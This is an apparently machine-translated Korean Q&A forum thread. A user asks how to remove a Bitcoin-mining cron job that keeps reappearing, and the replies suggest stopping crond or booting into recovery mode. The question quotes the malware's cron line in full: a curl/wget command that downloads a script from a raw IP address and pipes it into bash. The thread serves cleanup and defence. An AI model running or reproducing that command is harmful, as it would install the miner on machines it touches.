안녕하세요 여러분, 제 컴퓨터가 비트코인 채굴자에게 납치되었습니다. 그는 2초마다 실행되는 크론 작업을 가지고 있습니다. crontab -e로 제거하면 매우 빠르게 재생성되므로 작동하지 않습니다. nano 또는 vi 편집기를 사용하여 편집할 수 없습니다. 왜냐하면 내가 시도할 때마다 두 편집기를 열면 두 편집기를 모두 죽이는 코드가 실행되기 때문입니다. 그의 크론 작업은 다음과 같습니다.
*/30 * * * * (curl -s http://192.210.175.103/mr.sh||wget -q -O - http://192.210.175.103/mr.sh)|bash -sh
작업은 /tmp에서 실행 중이지만 원본 파일은 계속 변경됩니다. 이 문제를 해결하는 방법에 대한 아이디어가 있습니까? 감사해요
답변1
인터넷 연결을 끊고 cron을 중지할 수 있습니다.
sudo /etc/init.d/crond stop
그런 다음 cronjob을 편집합니다.
답변2
문제의 스크립트에 대해 더 많이 알지 못하면 이 질문에 정확하게 대답하기는 어렵지만 일반적인 팁은 시스템을 단일 사용자 모드나 복구 모드로 재부팅하는 것입니다. 이렇게 하면 대부분의 데몬이 비활성화되고 문제 해결을 위한 루트 프롬프트가 표시됩니다.
이 위키 항목Ubuntu에서 Ubuntu의 프로세스를 설명합니다. 귀하의 질문에 따르면 복구 모드의 가장 매력적인 기능은 파일 시스템을 읽기 전용으로 마운트한다는 것입니다. 즉, 문제가 되는 코드가 어디든 확산되거나 숨겨지기 전에 검색할 수 있다는 의미입니다. 문제를 발견하면 읽기-쓰기 모드로 다시 설치하고 시스템에서 문제를 지우십시오.